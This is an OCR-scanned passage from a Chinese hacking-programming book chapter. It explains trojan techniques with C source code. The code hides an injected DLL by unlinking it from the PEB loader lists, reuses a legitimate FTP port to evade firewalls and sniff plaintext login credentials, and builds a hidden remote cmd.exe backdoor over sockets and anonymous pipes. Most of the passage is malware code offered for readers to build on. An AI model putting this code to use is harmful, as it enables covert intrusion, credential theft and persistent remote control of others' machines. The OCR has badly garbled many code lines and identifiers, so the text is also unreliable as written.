意 让 用 户 使 用 的 。 不 过 网 上 有 大 量 的 相关 结构 体 的 具体 定义 ， 读 者 可 以 自行 查找 进行 阅读 。 

看 完 上 面 的 各 种 结构 体 ， 是 不 是 觉得 自己 都 可 以 实现 枚 举 进程 中 模块 的 函数 了 ? 下 面 来 
MN 

3. 编写 枚 举 进程 中 模块 的 函数 

枚 举 进程 中 的 模块 的 方法 就 是 通过 上 面 介绍 的 几 个 结构 体 来 完成 的 ， 其 步骤 如 下 : 

获得 TEB 地 址 一 获得 PEB 地 址 一 得 到 LDR 一 获得 第 二 条 链表 的 地 址 一 遍历 该 链表 并 输 
出 偏 移 0x18 的 值 和 0x28 指向 的 内 容 。 

只 要 把 上 面 在 WinDBG 中 找到 链表 的 方法 弄 明 白 , 就 没有 太 大 的 问题 了 。 关 键 的 问题 是 
怎么 找到 TEB。TEB 保存 在 FS 中 ， 有 了 这 个 提示 就 很 好 解决 了 吧 ? 代码 如 下 : 


void EnumModule () 


DWORD *PEB = NULL, 
dE = NULL, 
*Flink = NULL, 
ww = NULL, 
*BaseAddress = NULL, 
*FUlIDI1lName = NULL; 

// 定位 PEB 

asm 


{ 
// fs 位 置 保存 着 TEB 
// fs:[0x30] 位 置 保存 着 PEB 


mov eax, fs: [0x30] 

mov PEB, eax 
} 
// 得 到 LDR 
Ldr = 0 (DWNORD MR jt msigiea olkar myPER YE Ox0cn) 
// 第 三 条 链表 
Fiink = *( ( DWORD ** ) 0 { unsigned char < YLdr + Ox14 TD ): 
Bp = Flink: 
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B= *( ( DNORDS*# )p )3 


while ( Flink != p ) 


{ . 
BaseAddress = *( {( DWORD ** )'( ( unsigned char */)p + Ox10 ) ); 
FuliDiliNanme = xf (“DWORD ** )!( ( Unsigned ehar 天 ) 了 十 020 -7 
if ( BaseAddress == 0 ) 
{ 
break; 
} 
printf("ImageBase = $%08x \r\n ModuleFullName = gsS \r\n", 
BaseAddress, (unsigned char *)FullDllName); 
Bs Sh ( DIORD ee Fp 
} 


} 

该 函数 的 实现 没有 太 多 的 技巧 ， 主 要 在 于 掌握 C 语言 中 指针 ， 还 有 就 是 能 够 掌握 以 上 介 
绍 的 几 个 结构 体 之 间 的 关系 ， 也 就 是 各 结构 体 之 间 的 数据 关系 。 在 main() 函 数 中 调用 这 个 函 
数 ， 输 出 结果 如 图 8-28 所 示 。 

4. 隐藏 指定 DLL 模块 

DLL 模块 的 隐藏 是 把 指定 DLL 模块 在 链表 中 的 节点 断 掉 ， 也 就 是 做 一 个 数据 结构 中 链 
表 的 删除 动作 ， 只 不 过 不 进行 删除 ， 只 是 将 其 节点 脱 链 即 可 ， 如 图 8-29 所 示 。 





节点 脱 链 前 后 


图 8-28 ” 自 实现 的 枚 举 模块 函数 图 8-29 链表 节点 脱 链 
如 果 是 枚 举 模块 的 话 ， 一 般 情况 下 ， 只 要 枚 举 第 二 条 链表 就 可 以 了 ， 也 就 是 偏 移 0x14 


处 的 那 条 。 如 果 要 做 模块 隐藏 的 话 ， 最 好 是 将 3 条 链表 中 的 指定 模块 全 部 脱 链 。 对 于 脱 链 的 
方法 ， 其 实 也 是 对 3 条 链表 进行 遍历 ， 然 后 将 指定 的 模块 脱 链 就 可 以 了 。 和 上 面 枚 举 的 方法 
差别 不 大 ， 下 面 给 出 代码 。 

void HideModule (char *szModule) 

{ 


DWORD *PEB = NUELL, 
*Ldr = NUEL, 
xElink = NULEL, 
*p s NULL, 
*BaseAddress = NULL, 
*FUlIlDllName = NULL; 

已 SI 

{ 
mov eax fs: [Ox30] 
mov PEB, eax 


} 
HMODULE hMod = GetModuleHandle (szModule); 


Ldr = DWORD wh YI Wt Unsloyned Char™ YPEBS+ "O00 ) 大 
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二 的 wi WORD ww dt nstogned ear * ldrite OxdDe YY ME 


Le 


ey: 
8 do 
章 { 
BaseAddress = *( ( DWORD ** )( ( unsigned char * )p + 0x18 ) ); 
FullpllName = * \( ( DRORD **,)({( ( unsigned char * })p + 0x28 ) ); 
a if (BaseAddress == (DWORD *)hMod) 
{ 
编 wi DHAORD tH YHABDI I ), = (DWORDY *( ({ PWORD ww yp ); 
程 DVO (DWORNDY DWORD ww ) py 4 有 
| break; 
例 } 
剖 B= (DMORD, **  ) 
析 } while ( Flink != p ); 
Flink = *( ( DWHORD ** })\( '( Unsigned char * )}Lar + 0x14 ) Yn 
p = Flinks 
[二 do 
{ 
BaseAddress = *( ( DWORD ** )( ( unsigned char * )p + 0Qx10 ) ) 7 
FuULLDLILTNamMe A *(t (MDANORD *#* )( ( Unstgned char * Jp + Ox20 ) ) 7 
if {BaseAddress == (DWORD *)hMod) 
{ 
-DWORD ** YB EF 4 = 《DNORDY *{ ( DWNORDIN DY) 
T(t DWORD, #4 JD) +) TL) = (DWORDY TO ( DWNORD, Kx Yl + BY) 
break; 


} 
Ds DNORD, wy 和 > 
} while ( Flink != p ); 


Wiel = eo DRORDN YM nsiogned car * Ler lt lel 

p = Flinky 

do 

{ 
BaseAddress = * ( ( DWORD ** )(( unsigned char * )p + 0x8 ) ); 
FullDiNane = * { ( DWORD ** ) (I( unsigned eharm*” )p + Oxl8 ) )} 


if (BaseAddress 
{ 


= (DWORD *)hMod) 


*x*( ( DWORD ** ) (P + 1) ) = (DWORD) *( ( DWORD xx )p ); 
*(* ( ( DWORD ** )p ) + 1) = (DWORD) *( ( DWORD ** )(p + 1) ); 
break; 

} 

p= *( (DWORD ** )p ): 

| } whike ( Flink l=°p )» 

} 


| “在 main0 函 数 中 调用 这 个 函数 ， 主 函数 如 下 ; 
| int main(int argc, char* argv[]) 


{ 





HideModule ("kernel32,.d11"); 
getchar()» 


return 07 


} 

接 下 来 隐藏 调用 “kernel32.dll” 模 块 。 当 然 ， 这 里 的 隐藏 只 能 是 这 个 程序 运行 时 隐藏 该 
进程 中 的 “kernel32.dll” 模 块 ， 对 其 余 进程 中 的 模块 并 没有 影响 。 在 程序 的 末尾 使 用 getchar()， 
其 用 意 是 希望 该 进程 可 以 停留 住 ， 否 则 它 如 果 退 出 ， 便 没有 验证 “kernel32.dll” 模 块 是 否 3 
的 被 隐藏 的 机 会 了 。 编 译 连接 并 运行 ， 然 后 用 第 3 章 中 的 工具 碍 看， 如 图 8-30 所 示 。 

从 图 8-30 中 可 以 看 出 ， 在 HideModule.exe 进程 中 看 不 到 Kernel32.dll 的 模块 名 。 当 然 ， 
就 算 用 自己 编写 的 枚 举 的 模块 函数 也 是 没 用 的 ， 因 为 模块 已 经 不 在 链表 中 了 。 虽 然 这 个 程序 
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把 进程 中 “kernel32.dll” 隐 藏 了 ， 但 是 并 没有 多 大 的 实际 意义 。 隐 藏 模块 主要 是 用 在 被 注入 
的 DLL 中 , 也 就 是 一 个 DLL 文件 被 注入 远程 线程 中 后 , 再 调用 该 函数 来 隐藏 被 注入 的 DLL， 
为 了 不 被 发 现 而 隐藏 。 


0 各 DLL 
Ji deWoduls, exe 下: 黑客 进化 一 . .. 
ntdll. dl C: WINDOWS sy. . 


99. exe 
MSDEY, EXE 
VCSPAWN. EXE 


4 eonime. exe 
25 HanageProcess, axe 





图 8-30 查看 HideModule 中 Kernel32.dll 模块 被 隐藏 


8.1.6 ”端口 复 用 技术 


木马 的 服务 端 与 客户 端 通信 必 将 产生 活动 端口 ， 产 生活 动 端口 就 很 容易 被 发 现 ， 那 么 应 
该 如 何 隐藏 端口 呢 ? 这 就 是 本 小 节 要 介绍 的 内 容 。 

1. 端口 复 用 的 原理 

端口 复 用 就 是 某 个 已 经 被 其 他 服务 绑 定 过 的 端口 再 次 被 绑 定 而 进行 重复 使 用 。 端 口 复 用 
对 于 木马 程序 来 说 有 两 个 好 处 。 第 一 个 好 处 是 隐藏 端口 ， 比 如 某 台 主机 上 搭建 了 FTP 服务 器 ， 
这 样 默认 情况 下 就 开启 了 21 号 端口 ， 通 过 端口 复 用 就 可 以 直接 使 用 21 号 端口 完成 木马 的 通 
信 ， 在 进行 检测 时 就 不 会 发 现 有 多 余 的 端口 被 打开 ; 第 三 个 好 处 是 不 会 被 防火 墙 阻 拦 ， 因 为 
端口 复 用 FTP 服务 端口 或 Web 服务 端口 这 些 已 知 和 合法 的 端口 ， 这 些 端口 在 服务 器 上 是 正 
常 使 用 的 端口 ， 那 么 管理 员 当 然 会 允许 这 些 正常 服务 的 通信 连接 。 

木马 使 用 端口 复 用 技术 后 , 由 于 木马 和 被 复 用 服务 使 用 同一 个 端口 (比如 木马 复 用 了 FTP 
的 21 号 端口 )， 当 数据 包 到 达 时 ， 系 统 根据 指定 IP 地 址 较 详细 的 原则 就 传递 给 谁 。 前 面 章节 
中 ， 指 定 人 P 地 址 时 的 代码 如 下 : 


sockaddr in saddr; 
saddr.sin addr.S un.S.addr = TNADDR ANY,; 


在 代码 中 对 地 址 的 赋值 使 用 了 INADDR_ANY， 表 示 任 意 的 本 机 人 P 地 址 都 可 以 。 这 样 指 定 
的 地 址 不 是 最 明确 的 。 通 常 提 供 服 务 的 Web 服务 器 或 FTP 服务 器 都 有 类 似 的 设置 。 那 么 在 编写 
使 用 端口 复 用 技术 的 木马 时 ， 就 要 明确 指定 用 户 所 使 用 的 一 个 IP 地 址 。 无 论 用 户 是 拥有 内 网 的 
IP 地址， 还 是 有 外 网 的 正 地 址 ， 都 拥有 一 个 回环 地 址 ， 即 127.0.0.1。 在 设置 重复 绑 定 的 端口 时 ， 
可 以 设置 为 除 127.0.0.1 之 外 的 任意 具体 IP 地 址 。 比 如 ， 可 以 设 定 一 个 “10.10.30.77” 耳 地 址 。 
而 127.0.0.1 这 个 回环 地 址 是 木马 与 提供 服务 的 服务 器 软件 进行 通信 的 。 示 意图 如 图 8-31 所 示 。 

从 图 8-31 中 可 以 看 出 ， 无 论 是 防火 墙 外 部 还 是 防火 墙 内 容 ， 木 马 都 是 可 以 正常 通信 的 。 
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复 用 了 FTP 服务 器 端口 的 木马 会 收 到 所 有 


客户 测 
















发 给 FIP 服务 器 的 数据 ， 那 么 木马 在 中 间 ET 

童 | 充当 一 个 数据 中 转 的 作用 , 把 原本 发 给 FTP i 

是 | 服务 器 的 数据 还 是 转发 给 FTP 服务 器 。 如 A 

客 | 何 区 分 是 发 给 FTP 服务 器 的 数据 , 还 是 发 此 | 。 | 。 端口 的 木马 服务 器 

稳 | 给 木马 的 数据 ? 根据 前 面 章节 的 内 容 ， 凡 六 

实 | 是 发 给 木马 的 数据 都 是 有 固定 的 数据 头 部 

好 | 的 ， 以 此 可 以 判断 哪些 数据 转发 、 哪 些 数 Ce a 

析 | 据 自己 进行 处 理 。 由 于 木马 所 处 的 通信 位 En 

置 ， 很 容易 截取 到 发 送 给 FTP 服务 器 的 数据 ， 也 很 容易 算 改 FTP 服务 器 发 送 给 客户 端的 数据 。 

La 


是 很 可 怕 、 很 危险 的 。 同 样 ， 如 果 复 用 的 是 Web 服务 器 的 端口 ， 那 么 就 可 以 在 不 修改 
Web 页 面 的 情况 下 ， 直 接 发 送 给 浏览 器 一 些 恶 意 代码 ， 从 而 对 用 户 进行 攻击 。 

2， 端口 复 用 的 代码 实现 

前 面 已 经 把 端口 复 用 的 原理 讲述 清楚 ， 下 面 来 看 源 代码 的 实现 。 


#include staioun> 
#include <winsock2.h> 





#pragma comment {lib, "ws2 32") 
DWORD WINAPI ClientThread (LPVOID lJpParam); 


Rt madrey 
{ 
WSADATA wsa; 
SOCKET 8; 
BOOL bvVal; 
SOCKEL [aGy 
二 人世 nAddrolze, 
sockaddr in ClientAddr; 


// 初始 化 SOCK 库 
WSAStartup (MAKEWORD (2, 2), &wsa); 


// 建立 套 接 字 
s = socket (PF INET, SOCK STREAM, IPPROTO TCP); 


bvVal = TRUE; 


// 设置 套 接 字 为 复 用 模式 
if (setsockopt (s, SOL SOCKET, SO .REUSEADDR; (char *)é&bVal, /sizeof (bYal)) != 0) 
{ 

DointEt( em rand Ne Nay 


retarn l= 


sockaddr in sListen; 

sListenrsLhn tamlly lAF. TNET; 

// 这 里 的 IP 地 址 必须 明确 指定 一 个 地 址 
sListen,simaddr.Sunn.s ador minetladde(r L922 EB. 1 UO TY 
sListen.sin port = htons(21); 


// 绑 定 21 号 端口 
if ( bind(s, (SOCKADDR*)&sListen, sizeof (SOCKADDR)) == SOCKET ERROR ) 
{ 
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Delntf( "sd\iNn" Oatrasterror(y) 
BednbE(llerror blind \ NE Ye 
et 

} 


// 监听 套 接 字 


Tistents ,Fs 


/7 循环 接受 来 自 FTP 客户 端 或 木马 的 请 求 
while ( TRUE ) 


{ 
HANDLE hThread; 


nAddrSize = sizeof (SOCKADDR); 


// 接受 请 求 
se = accept(s, (SOCKADDR*)&ClientAddr, &nAddrSize); 
EE MSE t= TNVALID SOCKET') 


7/ 创建 新 线程 进行 处 理 
hTrhread = CreateThread(NULL, 0, ClientThread, (LFVOID)sc, 0, 
CloseHandle (hThread); 


} 


closesocket(s); 
WSACleanup(); 


teturn 0 


DWORD WINAPI ClientThread (LPVOID lpParam) 


4 


// 保存 与 FTP 客户 端 通信 的 SOCKET 

SOCKET ‘sc = (SOCKET)lpParam; 

// 建立 与 FTP 服务 器 端 通信 的 SOCKET 

SOCKET SFLDZ7 

sockaddr in saddr; 

DWORD dwTimeOut; 

DWORD dwNum; 

BYTE DBuffer[fOxto00) = 0 0 } 

sEtp,= Socket (PE TNET, SOCK STREAM, LTPPROTO TOP) : 


sadadr.sin family = AF_INET; 
Saddr.Sin ader omun Suaddr = inet addr(t lL27 00.Ln); 
sadodr sinport = htons(21)s 


// 设置 超时 
dwTimeOut = 100; 
setsockopt (ste, SOL SOCKET, SO. ROCVTIMEO, 
(char *)&dwTimeOut, sizeof (dwTimeOut)); 
setsockopt'(sBtpy SOLISQOCKED, "SO RCVPIMEO, 
(char *)g&dwTimeOut, sizeof (dwTimeOut)); 


// 连接 FTP 服务 器 
connect(sFtp, (SOCKADDR*)&saddr, sizeof (SOCKADDR)); 


// 循环 接受 客户 端 与 服务 器 的 通信 数据 
while ( TRUE ) 


/7 接收 客户 端的 数据 
了 WwWNDRTEETTEEGY (se, (Ghar “ybpuffer, 0xlO00.,., Os 
if ( dwNum > 0 && dwNum != SOCKET ERROR ) 
{ 
bBuffer[ldwNum] = '\0'» 
Drintt( "es NENnn, DBur fory 
// 转发 给 FTP 服务 器 端 
send(sFtp,, (char *)bBuffer, dwNum, 0) 7， 


NULL); 
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} 
else if ( 


{ 
I 


[0 


dwNum 


break; 
} 


ZeroMemory (bBuffer, 
// 接收 FTP 服务 器 端 
dwNum 
向 以 
{ 


dwNum > 0 && 


bBuffer[ldwNum] 


Printtt 
// 转发 给 客户 端 


send(sc, (char * 








| } 
else if 


{ 


( dwNum == 0 


break; 


} 


ZeroMemory (bBuffe 


} 


Closesocket (sc); 
closesocket (sFtp}); 


给 中 
给 出 


了 详细 的 注释 ， 这 时 
并 没有 提供 木 
发 送 的 木马 命 人 


gy 人 码 中 
i 
后 先 判断 是 控制 


BEL 
六 向 分 


据 第 2 章 的 介绍 自行 完成 。 木 马 在 


VN Ny 


马 的 相应 功能 。 如 果 加 入 木马 的 功能 ， 


) 


0x1000)? 


的 数据 
recv (sFtp; {cc 
dwNum 


*)bBuffer, OQxl1000; 
1= SOCKET ERROR ) 


shar 0)» 


NOY 
bBuffer); 


)bBuffer, dwNum, 0); 


) 


Ox1000); 


这 里 的 代码 中 只 是 实现 了 一 个 端口 
就 要 在 木马 收 到 数据 
还 是 应 该 转发 的 数据 ， 从 而 进行 相应 的 处 理 。 请 读者 根 


转发 数据 的 过 程 中 获取 了 FTP 数据 ， 如 图 8-32 所 示 。 


里 就 不 做 过 多 的 解释 。 


日 


二 


狼 





编译 连接 自己 的 代码 ， 然 后 先 启 动 FTP 服务 器 ， 再 启动 连接 好 的 木马 ， 


接 FTP 服务 器 。 在 木马 转发 的 过 种 
密码 的 传输 都 是 明文 进行 的 )。 








以 上 | 





木马 转发 数据 


通过 命令 行 下 连 
民 务 器 的 账号 和 密码 (FTP 对 于 账号 和 
在 转发 数据 包 的 过 程 中 也 成 了 针对 某 服 务 的 嗅 


中 得 到 了 登录 FTP 月 
来 看 ,木马 
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探 工具 。 
如 法 炮制 , 通过 简单 修改 上 面 的 代码 则 可 以 改 成 一 个 跳板 程序 。 具体 实现 方式 与 此 类 似 ， 
就 不 再 进行 阐述 。 作 为 延展 性 的 内 容 ， 请 读者 自行 完成 。 


8.1.7 远程 cmd 通信 技术 


在 各 种 黑客 电影 、 电 视 中 ， 经 常会 看 到 黑客 在 黑 底 白字 地 输入 各 种 命令 进行 攻击 。 有 时 
是 系统 自 带 的 命令 行 工具 ， 即 cmd.exe; 有 时 是 一 些 其 他 基于 命令 行 的 工具 ， 比 如 metasploit。 
用 系统 自 带 的 命令 行 工具 ， 一 般 是 操作 自己 的 主机 系统 。 如 何 通过 命令 行 操 作 其 他 人 的 主机 
系统 是 下 面 要 介绍 的 内 容 。 

1. 管道 技术 

管道 是 一 种 简单 的 进程 间 通 信 的 技术 。 在 Windows 下 ， 进 程 间 通信 技术 有 邮 模 、 事 件 、 
文件 映射 、 管 道 等 。 管 道 可 以 分 为 命名 管道 和 匿名 管 。 匿 名 管道 比 命名 管道 要 简单 许多 ， 它 
是 一 个 未 命名 的 单 向 管道 ， 常 用 来 在 一 个 父 进程 和 一 个 子 进程 之 间 传 递 数据 。 匿 名 管道 只 能 
实现 本 地 机 器 上 两 个 进程 间 的 通信 ， 不 能 实现 跨 网 络 的 通信 。 

匿名 管道 由 CreatePipeO 函 数 创建 ， 管 道 有 读 句柄 和 写 句 柄 ， 分 别 作为 输入 和 输出 。 
CreatePipe() 函 数 的 定义 如 下 : 


BOOL Createpipel 
PHANDLE hReadPipe, 
PHANDLE hwritePipe, 
EPSECURITY ATTRIBUTES lpPipeAttributes, 
DWORD nsize 


)? 

CreatePipe(O) 函 数 将 创建 一 个 匿名 管道 ， 并 返回 该 匿名 管道 的 读 句 柄 和 写 句 柄 。 该 函数 有 
4 个 参数 ， 分 别 如 下 。 

hReadPipe: 指向 HANDLE 类 型 的 指针 ， 返 回 管道 的 读 句柄 。 

hWritePipe: 指向 HANDLE 类 型 的 指针 ， 返 回 管道 的 写 句 柄 。 

nSize: 指定 管道 的 缓冲 区 大 小 。 这 里 赋值 为 0， 使 用 系统 默认 大 小 的 缓冲 区 。 

lpPipeAttributes: 指向 SECURITY_ATTRIBUTES 结构 体 的 指针 ,检测 返回 的 句柄 是 否 能 
被 子 进程 集成 。 如 果 此 参数 为 NULL， 则 表示 句柄 不 能 被 继承 。 匿 名 管道 只 能 在 父子 进程 间 
进行 通信 , 进行 数据 的 传递 。 那么 子 进程 如 果 想 要 获得 匿名 管道 的 句柄 ， 只 能 从 父 进 程 继承 。 
SECURITY _ ATTRIBUTES 结构 体 定义 如 下 : 

typedef struct _SECURITY ATTRIBUTES, { 

DWORD nLength; 

LPVOID lpSecurityDescriptor; 


BOOL binheritHandle;  “ 
} SECURITY ATTRIBUTES; *PSECURITY ATTRIBUTES7 


SECURITY_ATTRIBUTES 结构 体 有 3 个 成 员 ， 分 别 说 明 如 下 。 

nLength: 指定 该 结构 体 的 大 小 ， 一 般 使 用 sizeof() 来 进行 计算 。 

lpSecurityDescriptor: 指向 一 个 安全 描述 符 指 针 ， 这 里 可 以 赋值 为 NULL。 

bInheritHandle: 该 成 员 指定 所 返回 的 句柄 是 否 能 被 一 个 新 的 进程 所 继承 。 如 果 此 成 员 设 
置 为 TRUE， 那 么 返回 的 句柄 能 够 被 进程 继承 。 这 里 设置 为 TRUE。 

一 个 匿名 管道 有 两 头 ， 分 别 是 读 句柄 和 写 句 柄 。 写 句柄 用 来 往 管道 中 写 入 数据 ， 读 句柄 
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用 来 把 管道 中 的 数据 读 出 来 。 向 管道 读 取 或 写 入 数据 ， 直 接 调用 ReadFile() 或 WriteFile() 即 可 。 

在 对 管道 进行 读 取 前 ,， 先 要 判断 管道 中 是 否 有 数据 存在 ， 如果 有 数据 ， 则 使 用 ReadFile() 
函数 将 管道 中 的 数据 读 出 ， 以 避免 数据 接收 方 长 时 间 等 待 。 判 断 管道 中 是 否 有 数据 存在 的 函 
数 是 PeekNamedPipe()， 其 定义 如 下 : 


BOOL PeekNamedPipe! 
HANDLE hNamedPipe, 
LPVOID LpBuffer;y 
DWORD nBuffersize, 
LPDWORD lpBytesRead, 
LPDWORD lpTotalBytesAvail, 
LPDWORD lpBytesLeftThisMessage 


i 

该 函数 有 6 个 参数 ， 其 含义 分 别 如 下 。 

hNamedPipe: 要 检查 的 管道 的 句柄 。 

lpBuffer: 读 取 数据 的 缓冲 区 。 

nBufferSize: 读 取 数据 的 缓冲 区 大 小 。 

lpBytesRead: 返回 实际 读 取 数 据 的 字 节 数 。 

lpTotalBytesAvail: 返回 读 取 数据 总 的 字 节 数 。 

lpBytesLeftThisMessage: 返回 该 消息 中 剩余 的 字 节 数 ， 对 于 匿名 管道 可 以 为 0。 

该 函数 读 取 管 道中 的 数据 ,但 是 不 从 管道 中 移 除 数据 。 当 有 数据 后 ， 可 以 调用 ReadFile() 
来 完成 数据 的 读 取 操作 。 为 了 避免 长 时 间 等 待 ， 可 以 先 调 用 PeekNamedPipeO 函 数 判 断 管道 
中 是 否 有 数据 ， 也 可 以 通过 主线 程 分 别 开 启 用 于 读数 据 和 写 数据 的 线程 ， 这 样 在 读数 据 时 就 
可 以 不 用 进行 是 否 有 数据 的 判断 了 。 这 里 采用 前 者 。 

匿名 管道 的 通信 和 数据 传递 是 在 父子 进程 之 间 进 行 的 。 创 建 进程 的 函数 在 前 面 的 章节 已 
经 介绍 过 了 , 这 里 再 回顾 一 下 。 前面 介 绍 的 创建 进程 的 函数 非常 多 ,但 是 只 有 CreateProcess() 
函数 满足 现在 的 要 求 。CreateProcess(0) 函 数 的 定义 如 下 : 


BOOL CreateProcess( 
LPCTSTR lpApplicationName, 
LPTSTR ipCommandLine, 
LPSECURITY ATTRIBUTES JpProcessAttributes, 
LPSECURITY ATTRIBUTES lpThreadAttributes, 
BOOL bInheritHandles, 
DWORD dwCreationFlags, 
LRPVOID lpEnvyironment, 
LECTESTR LpOUrrentDirectory, 
LPSTARTUPINFO lpStartupInfo, 











LPPROCESS_ INFORMATION lpProcesslInformation 


) 六 

该 函数 的 大 部 分 参数 在 前 面 的 章节 已 经 介绍 过 了 ， 这 里 具体 介绍 bInheritHandles 和 
lpStartupInfo 两 个 参数 。 

bInheritHandles: 该 参数 用 来 指定 父 进程 创建 的 子 进程 是 否 能 够 继承 父 进程 的 句柄 。 如 果 
该 参数 为 TRUE， 那么 父 进程 的 每 个 可 以 继承 的 打开 的 句柄 都 能 够 被 子 进程 继承 。 

lpStartupInfo: 一 个 指向 STARTUPINFO 结构 体 的 指针 。 该 结构 体 用 来 指定 新 进程 的 主 窗 
口 将 如 何 显示 ， 输 入 输出 等 启动 信息 。STARTUPINFO 结构 体 的 定义 如 下 : 


tvsedet stract LSTARLTHPLINDONI 
DWORD Cbs? 
LPTSTR lpReserved; 
LETSTR | JDDeskKt op 














0 
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LPLSTR STLeELe 
DWORD dwX; 
DWORD dwY;} 
DWORD dwxXxSize; 
DWORD dwYSize; 
DWORD dGwXCountChars; 
DWORD dwYCountChars; 
DWORD dwFillAttribute; 
DWORD dGwFlags; 
WORD wShowWindow; 
WORD cbReserved2; 
LEBYTE, lpReserved2; 
HANDLE hstdIinput; 
HANDLE hstdoutput; 
HANDLE hstdprror; 

} STARTUPINFO, *LPSTARTUPINEFO; 


该 结构 体 是 设 定 被 创建 子 进程 的 启动 信息 ， 它 的 成 员 非 常 多 ， 这 里 主要 使 用 其 中 的 6 个 
参数 ， 具 体 如 下 。 

cb: 用 于 指明 STARTUPINFO 结构 体 的 大 小 。 

dwFlags: 用 于 设 定 STARTUPINFO 结构 体 的 哪些 字段 会 被 用 到 。 

wShowWindow: 用 于 设 定子 进程 启动 时 的 现实 方式 。 

hstdInput， 用 于 设 定 控制 台 的 标准 输入 句柄 。 

hstdOutput:， 用 于 设 定 控制 台 的 标准 输出 句柄 。 

hStdError: 用 于 设 定 控制 台 的 标准 出 错 句柄 ， 类 似 于 标准 输出 句柄 ， 之 所 以 要 与 
hStdOutput 分 开 ， 是 因为 有 时 出 错 后 需要 记录 到 文件 中 。 

以 上 就 是 管道 后 门 所 需要 使 用 到 的 API 函数 ， 下 面 来 具体 介绍 关于 管道 后 门 的 实现 技术 
方式 。 

后 门 分 为 控制 端 和 被 控制 端 。 由 于 这 里 实现 的 是 一 个 命令 行 的 后 门 ， 那 么 控制 端 就 是 在 
不 断 输入 相应 的 命令 ， 比 如 dir、net user、ping 等 命令 。 注 意 ， 这 些 命令 并 不 是 在 控制 端 执 
行 ， 而 是 送 入 远程 的 被 控制 端 执行 。 当 远程 的 被 控制 端 执行 完 控制 端 需 要 执行 的 命令 后 ， 需 
要 把 相应 的 返回 结构 发 送 给 控制 端 。 

这 里 后 门 的 需求 已 经 明确 ， 就 是 把 控制 台 的 命令 和 控制 台 的 结果 不 断 进行 传输 。 方 法 是 
被 控制 端的 父 进程 接收 控制 端 发 来 的 命 
令 ， 同 样 被 控制 端的 父 进程 发 送 命令 运 | 命令 的 发 送 
行 的 结果 给 控制 端 ， 而 执行 命令 则 由 父 0 
进程 创建 的 子 进程 《cmd.exe〉 来 完成 。 
通信 过 程 如 图 8-33 所 示 。 ER 

控制 端 和 被 控制 端 使 用 前 面 章节 介 [Rn ] [到 | 
绍 过 的 socket 来 完成 通信 ， 而 父 进程 和 ( a 

(用 于 执行 命令 ) 













被 控制 让 
(用 于 接收 命令 和 
发 送 执行 结果 ) 





一 -| 








执行 结果 的 接收 





子 进程 之 间 的 通信 则 用 本 小 节 介绍 的 匿 

名 管道 来 完成 。 父 进程 启动 子 进 程 前 ， 

需要 将 STARTUPINFO 中 的 输入 输出 名 i 

柄 重 定向 到 匿名 管道 中 ， 这 样 父 进程 才能 通过 管道 向 子 进 程 中 传递 命令 ， 而 子 进程 也 能 通过 
管道 将 命令 的 返回 结果 传递 给 父 进 程 。 





将 后 革 啊 狂 山 吕 波 


亲民 宣 
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2. 双 管 道 后 门 代 码 实 现 
第 前 面 介绍 了 管道 的 原理 ， 现 在 来 看 管道 的 编写 远程 cmd 后 面 的 实现 代码 ， 有 具体 如 下 : 
8 #include <stdio,.h> 
章 #include <winsock2,h> 
#pragma comment (lib, "ws2 32") 
丙 
客 Lnt mainm() 
编 1 
程 WSADATA wsa; 
i 
商 WSsaAStartup (MAKEWORD (2, 2), &wsa); 
剖 // 创建 TCP 套 接 字 
析 SG 区 RS = socket (PE INRLE "SOCK STREAM," LERPROTO ECPJ)J 7 





| // 绑 定 套 接 字 

nid sockaddr_in sock; 

sock.sinufamily = A INETD,; 
sock.sin addr.Ss un.s addr = ADDR ANYI; 
sook.sin.port I= htons (888)' 

bind(s,. (SOCKADDR*)'&sock, sizeof (SOCKADDR))'; 


// 置 套 接 字 为 监听 状态 


stent 


// 接受 客户 端 请 求 

sockaddr in sockClient; 

int SaddrSize = sizeof (SOCKADDR); 

SOCKET Se = accept(s, (SOCKADDR*)EsockClient, gSaddrsize)’; 


// 创建 管道 
SECURITY.ATTRIBUTES Sal，sSa27 
HANDLE hReadl, hRead2, hWritel, hWrite2; 


sal,nLength = sizeof (SECURITY ATTRIBUTES); 
sal.lpSecurityDescriptor = NULL; 
sal.blInheritHandle = TRUE; 


sazanLength = sizeor (SECURITDY ATTRIBUTES) ; 
sa2.1pSecurityDescriptor = NULL; 
sa2.bInheritHandle = TRUE; 


Createpipel(ghReadl, ghWritel; &sal, 0) 7; 
CreatePpipe (&hRead2, &hWrite2, &sa2, 0); 


// 创建 用 于 通信 的 子 进 程 
“STARTUPINEFO si; 
PROCESS_INFORMATION pi; 





ZeroMemory(&si, sizeof (STARTUPINFO)); 

si,cb = sizeof (STARTUPINEO); 

si,dwElags = STARTF USESHOWWINDOW | STRARTE USESTDHANDLES; 
// 为 了 测试 ， 这 里 设置 为 Sw_sHOW， 在 实际 中 应 该 为 SW_HTDE 
si.wShowWindow = SW SHOW; 
// 蔡 换 标准 输入 输出 句柄 

// 对 于 后 门 程序 ， 管 道 1 用 于 输出 
// 对 于 后 门 程序 ， 管 道 2 用 于 输入 
si,hSstdinput 三 hRead2; 
si.hstdOoutput = hWritel; 
si.hStdprror= NWritel, 











char ewemd = Mom 


CreateProcess{NULL, szCmd, NULL, NULEL, 
亲生 
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DWORD dwBytes = 0; 
BOOL bRet = FALSE; 第 
ehar, SZButteelo0xl000 = 1{ I 8 
char szCommand[0x1000] = { 0 1}; 章 
While ( TRUE ) 
ZeroMemory (szCommand, 0x1000); 编 
DRet = PeekNamedPipe(hReadl, szBuffer, 0xl1000, &dwBytes, 0, 0); 程 
if '( dwBytes ) 实 
| , 例 
// 当 hstdoutput 和 hstdgrror 向 管道 1 写 入 数据 后 剖 
/7 应 该 将 管道 1 中 的 数据 读 出 析 
ReadFile(hReadl, szBuffer, Oxl1000, &dwBytes; NULE); 
sendl(lsc, szBuftfter, dwBytes, 0); 
} 
else PE 
{ 
A ne 
1 A 2 中 
oo 


ph i 在 发 送 字符 时 是 逐个 发 送 的 
/7/ 因此 这 里 需要 合并 完整 的 命令 
We Ca 
{ 
dwBytes = recv(se, szBuffer, Ox1000, 0); 
iE ( dwBytes <= 0 ) 
{ 
break; 


} 


szCommand[i++] = SzBuffer[0]; 


a (0 amuttertor se Ne Fl SButferrLo ==" ANY 本 
{ 

sz2Commandlis1] 三 Na; 

break; 


} 
} 
WriteFile (hwWrite2, szCommand, i, &dwBytes, NULL); 


} 
WSACleanup (); 


return 0; 


编译 连接 并 运 运行 这 个 后 门 ， 然 后 用 telnet 命令 连接 该 后 门 ， 就 可 以 测试 该 后 门 的 效果 了 。 
